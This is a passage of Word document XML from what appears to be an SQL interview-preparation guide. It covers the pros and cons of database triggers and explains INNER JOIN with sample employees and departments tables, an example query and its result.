    </w:p>
    <w:p w14:paraId="3D5020F6"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ata Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers can enforce complex business rules and data constraints, ensuring that the data is valid and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D42D3"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Auditing</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers can help in logging changes for auditing purposes, which is especially useful in applications that require a detailed history of data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9811B" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Disadvantages of Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6AA43B"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Performance Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since triggers are executed automatically, they can add overhead, especially if complex operations are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B207B"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Hidden Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers execute in the background, and their actions may not always be immediately visible to users or developers, which can make troubleshooting and debugging more challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89FF9A"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omplexity</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Excessive use of triggers can lead to complex interdependencies between triggers, making it harder to maintain the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F8698"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Not Always Transparent</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Because triggers execute automatically, it can sometimes be unclear to developers what changes are being made to the database, especially if the logic inside the trigger is complicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B5248" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">In summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are powerful tools that help automate actions in response to specific database events, ensuring data consistency, security, and auditability. However, they should be used judiciously to avoid unnecessary complexity or performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB8D291" w14:textId="4CD1F1D7" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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47E500E">
          <v:rect id="_x0000_i2999" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3842B0ED" w14:textId="0E50FC00" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="001D1EE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="719" w:name="_Toc196308199"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is inner join in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="719"/>
    </w:p>
    <w:p w14:paraId="06328749" w14:textId="2933EF9B" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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INNER JOIN in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CB06B"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of join in SQL that returns records from two tables that have matching values in the columns involved in the join condition. The result set includes only those rows where there is a match between the specified columns in both tables. If there is no match, the row is not included in the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988DBDA" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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Syntax of INNER JOIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72671202"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ELECT columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772AD26E"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FROM table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7C1F8"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NNER JOIN table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30391240"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ON table1.column_name = table2.column_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187DDBD9" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67C8F5"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SELECT columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the columns that you want to retrieve from both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B953087"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FROM table1</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The first table (the left table in the join).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6573767E"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INNER JOIN table2</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The second table (the right table in the join).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995BC9B"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ON table1.column_name = table2.column_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The condition that defines how to match rows from the two tables, typically based on a common column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20715150" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36493D15"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onsider two tables: employees and departments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9325C"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mployees Table</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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63"/>
        <w:gridCol w:w="1592"/>
        <w:gridCol w:w="1451"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="7EB5AD5F" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05CDC433" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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employee_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41EC84A9" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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employee_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29AA20B6" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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department_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="14CDC8FE" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AC90BC0"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD49081"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB870D7"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="3BA7181B" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35A4666E"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EFA5F9A"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Jane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66328862"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="5995FD5A" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14548AFE"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A64FB2F"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Tom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F04E36F"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103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="0848242D" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A255257"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D4BBFB"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ara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="603C66FF"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52A0762A"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epartments Table</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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1"/>
        <w:gridCol w:w="1795"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="5B783657" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70E1FC5A" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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department_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289AF365" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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department_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="58E9A991" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC9A0D7"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B2C2DE6"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="28D40558" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="171B17CA"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056C5A62"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T</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="6DAB7A68" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DDCD18"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103</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2012008A"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Marketing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6683E489"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f you want to retrieve the employee names along with their department names, you can use an INNER JOIN between the employees and departments tables based on the department_id column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3463D" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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INNER JOIN Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A96A2"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F41A416"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440B4A9"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NNER JOIN departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F9AF9"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ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC92BA8" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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Resul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07"/>
        <w:gridCol w:w="1795"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="45F662A7" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F9CA6C5" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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employee_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47B6AC22" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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department_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="5C8E6B54" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18337364"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08DE8B30"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="7B65033E" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EB86CE0"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Jane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6435B4C6"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T</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="6086F934" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D3A5044"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Tom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71262C86"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Marketing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="1C5A89D5" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351328B7"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ara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B0DD2BE"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58667CCE" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECECF2A"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The query performs an INNER JOIN between the employees table (aliased as e) and the departments table (aliased as d).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE606B"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t matches rows from the two tables where the department_id column in employees matches the department_id column in departments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F59A8C"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The result set will only include employees who have a matching department in the departments table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E36D71C" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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lastRenderedPageBreak/>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E71660"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Matching rows</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only the rows with matching values in both tables are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04524C7A"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No matching rows</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If there is no matching row in either of the tables, that record is excluded from the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C9180"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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: INNER JOINs are generally fast, but performance can depend on the database and indexes on the join columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6876C9A4" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022993B"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NNER JOIN is commonly used when you want to retrieve related data from multiple tables where there is a direct relationship between them. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D418E"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Fetching customer orders and product details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8A540"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Retrieving user information and the roles assigned to them in a user-role relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED858B9" w14:textId="77777777" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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In summary, an </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a fundamental SQL operation used to combine rows from two or more tables based on a related column, ensuring that only rows with matching data from both tables are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF50137" w14:textId="017D1399" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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A78A5C9">
          <v:rect id="_x0000_i3000" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4966C" w14:textId="49BA7F27" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="720" w:name="_Toc196308200"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
